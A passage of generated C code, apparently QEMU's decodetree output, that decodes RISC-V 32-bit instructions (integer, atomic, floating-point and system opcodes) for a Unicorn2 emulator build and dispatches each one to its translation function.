.0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:105 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_slti(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:106 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_sltiu(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:107 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_xori(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:111 */ if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 01...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:112 */ if (trans_srai(ctx, &u.f_shift)) return true; return false; } return false; case 0x6: /* ........ ........ .110.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:108 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_ori(ctx, &u.f_i)) return true; return false; case 0x7: /* ........ ........ .111.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:109 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; } return false; case 0x00000017: /* ........ ........ ........ .0010111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:87 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_auipc(ctx, &u.f_u)) return true; return false; case 0x00000023: /* ........ ........ ........ .0100011 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:101 */ if (trans_sb(ctx, &u.f_s)) return true; return false; case 0x1: /* ........ ........ .001.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:102 */ if (trans_sh(ctx, &u.f_s)) return true; return false; case 0x2: /* ........ ........ .010.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:103 */ if (trans_sw(ctx, &u.f_s)) return true; return false; } return false; case 0x00000027: /* ........ ........ ........ .0100111 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:157 */ if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:185 */ if (trans_fsd(ctx, &u.f_s)) return true; return false; } return false; case 0x0000002f: /* ........ ........ ........ .0101111 */ switch (insn & 0xf8007000) { case 0x00002000: /* 00000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:146 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_w(ctx, &u.f_atomic)) return true; return false; case 0x08002000: /* 00001... ........ .010.... 
.0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:145 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_w(ctx, &u.f_atomic)) return true; return false; case 0x10002000: /* 00010... ........ .010.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:143 */ if (trans_lr_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x18002000: /* 00011... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:144 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_w(ctx, &u.f_atomic)) return true; return false; case 0x20002000: /* 00100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:147 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_w(ctx, &u.f_atomic)) return true; return false; case 0x40002000: /* 01000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:149 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_w(ctx, &u.f_atomic)) return true; return false; case 0x60002000: /* 01100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:148 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_w(ctx, &u.f_atomic)) return true; return false; case 0x80002000: /* 10000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:150 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_w(ctx, &u.f_atomic)) return true; return false; case 0xa0002000: /* 10100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:151 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_w(ctx, &u.f_atomic)) return true; return false; case 0xc0002000: /* 11000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:152 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_w(ctx, &u.f_atomic)) return true; return false; case 0xe0002000: /* 11100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:153 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x00000033: /* ........ ........ ........ .0110011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:113 */ if (trans_add(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:115 */ if (trans_sll(ctx, &u.f_r)) return true; return false; case 0x00002000: /* 0000000. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:116 */ if (trans_slt(ctx, &u.f_r)) return true; return false; case 0x00003000: /* 0000000. ........ .011.... 
.0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:117 */ if (trans_sltu(ctx, &u.f_r)) return true; return false; case 0x00004000: /* 0000000. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:118 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:119 */ if (trans_srl(ctx, &u.f_r)) return true; return false; case 0x00006000: /* 0000000. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:121 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00007000: /* 0000000. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:122 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:133 */ if (trans_mul(ctx, &u.f_r)) return true; return false; case 0x02001000: /* 0000001. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:134 */ if (trans_mulh(ctx, &u.f_r)) return true; return false; case 0x02002000: /* 0000001. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:135 */ if (trans_mulhsu(ctx, &u.f_r)) return true; return false; case 0x02003000: /* 0000001. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:136 */ if (trans_mulhu(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:137 */ if (trans_div(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:138 */ if (trans_divu(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:139 */ if (trans_rem(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:140 */ if (trans_remu(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:114 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:120 */ if (trans_sra(ctx, &u.f_r)) return true; return false; } return false; case 0x00000037: /* ........ ........ ........ .0110111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:86 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00000043: /* ........ ........ ........ .1000011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:158 */ if (trans_fmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ 
.1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:186 */ if (trans_fmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000047: /* ........ ........ ........ .1000111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:159 */ if (trans_fmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:187 */ if (trans_fmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004b: /* ........ ........ ........ .1001011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:160 */ if (trans_fnmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:188 */ if (trans_fnmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004f: /* ........ ........ ........ .1001111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:161 */ if (trans_fnmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:189 */ if (trans_fnmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000053: /* ........ ........ ........ .1010011 */ switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:162 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x1: /* 0000001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:190 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x4: /* 0000100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:163 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x5: /* 0000101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:191 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x8: /* 0001000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:164 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x9: /* 0001001. ........ ........ 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:192 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0xc: /* 0001100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:165 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0xd: /* 0001101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:193 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x10: /* 0010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:167 */ if (trans_fsgnj_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:168 */ if (trans_fsgnjn_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:169 */ if (trans_fsgnjx_s(ctx, &u.f_r)) return true; return false; } return false; case 0x11: /* 0010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:195 */ if (trans_fsgnj_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:196 */ if (trans_fsgnjn_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:197 */ if (trans_fsgnjx_d(ctx, &u.f_r)) return true; return false; } return false; case 0x14: /* 0010100. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010100. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:170 */ if (trans_fmin_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010100. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:171 */ if (trans_fmax_s(ctx, &u.f_r)) return true; return false; } return false; case 0x15: /* 0010101. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010101. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:198 */ if (trans_fmin_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010101. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:199 */ if (trans_fmax_d(ctx, &u.f_r)) return true; return false; } return false; case 0x20: /* 0100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x1: /* 01000000 0001.... ........ 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:200 */ if (trans_fcvt_s_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x21: /* 0100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:201 */ if (trans_fcvt_d_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2c: /* 0101100. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:166 */ if (trans_fsqrt_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2d: /* 0101101. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:194 */ if (trans_fsqrt_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x50: /* 1010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:177 */ if (trans_fle_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:176 */ if (trans_flt_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:175 */ if (trans_feq_s(ctx, &u.f_r)) return true; return false; } return false; case 0x51: /* 1010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:204 */ if (trans_fle_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:203 */ if (trans_flt_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:202 */ if (trans_feq_d(ctx, &u.f_r)) return true; return false; } return false; case 0x60: /* 1100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:172 */ if (trans_fcvt_w_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:173 */ if (trans_fcvt_wu_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x61: /* 1100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000010 0000.... ........ 
.1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:206 */ if (trans_fcvt_w_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:207 */ if (trans_fcvt_wu_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x68: /* 1101000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:179 */ if (trans_fcvt_s_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:180 */ if (trans_fcvt_s_wu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x69: /* 1101001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:208 */ if (trans_fcvt_d_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:209 */ if (trans_fcvt_d_wu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x70: /* 1110000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:174 */ if (trans_fmv_x_w(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100000 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:178 */ if (trans_fclass_s(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x71: /* 1110001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00001000: /* 11100010 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:205 */ if (trans_fclass_d(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x78: /* 1111000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:181 */ if (trans_fmv_w_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; } return false; case 0x00000063: /* ........ ........ ........ .1100011 */ decode_insn32_extract_b(ctx, &u.f_b, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:90 */ if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x1: /* ........ ........ .001.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:91 */ if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x4: /* ........ ........ .100.... 
.1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:92 */ if (trans_blt(ctx, &u.f_b)) return true; return false; case 0x5: /* ........ ........ .101.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:93 */ if (trans_bge(ctx, &u.f_b)) return true; return false; case 0x6: /* ........ ........ .110.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:94 */ if (trans_bltu(ctx, &u.f_b)) return true; return false; case 0x7: /* ........ ........ .111.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:95 */ if (trans_bgeu(ctx, &u.f_b)) return true; return false; } return false; case 0x00000067: /* ........ ........ ........ .1100111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:89 */ if (trans_jalr(ctx, &u.f_i)) return true; return false; } return false; case 0x0000006f: /* ........ ........ ........ .1101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:88 */ decode_insn32_extract_j(ctx, &u.f_j, insn); if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00000073: /* ........ ........ ........ .1110011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1110011 */ switch (insn & 0xfe000f80) { case 0x00000000: /* 0000000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x0: /* 00000000 00000000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:74 */ if (trans_ecall(ctx, &u.f_empty)) return true; return false; case 0x20: /* 00000000 00010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:75 */ if (trans_ebreak(ctx, &u.f_empty)) return true; return false; case 0x40: /* 00000000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:76 */ if (trans_uret(ctx, &u.f_empty)) return true; return false; } return false; case 0x10000000: /* 0001000. ........ .0000000 01110011 */ switch ((insn >> 20) & 0x1f) { case 0x2: /* 00010000 0010.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:77 */ if (trans_sret(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* 00010000 0100.... .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:83 */ decode_insn32_extract_sfence_vm(ctx, &u.f_decode_insn3215, insn); if (trans_sfence_vm(ctx, &u.f_decode_insn3215)) return true; return false; case 0x5: /* 00010000 0101.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 01010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:79 */ if (trans_wfi(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x12000000: /* 0001001. ........ 
.0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:82 */ decode_insn32_extract_sfence_vma(ctx, &u.f_decode_insn3214, insn); if (trans_sfence_vma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x22000000: /* 0010001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:81 */ decode_insn32_extract_hfence_bvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_bvma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x30000000: /* 0011000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x40: /* 00110000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:78 */ if (trans_mret(ctx, &u.f_empty)) return true; return false; } return false; case 0x62000000: /* 0110001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:80 */ decode_insn32_extract_hfence_gvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_gvma(ctx, &u.f_decode_insn3214)) return true; return false; } return false; case 0x1: /* 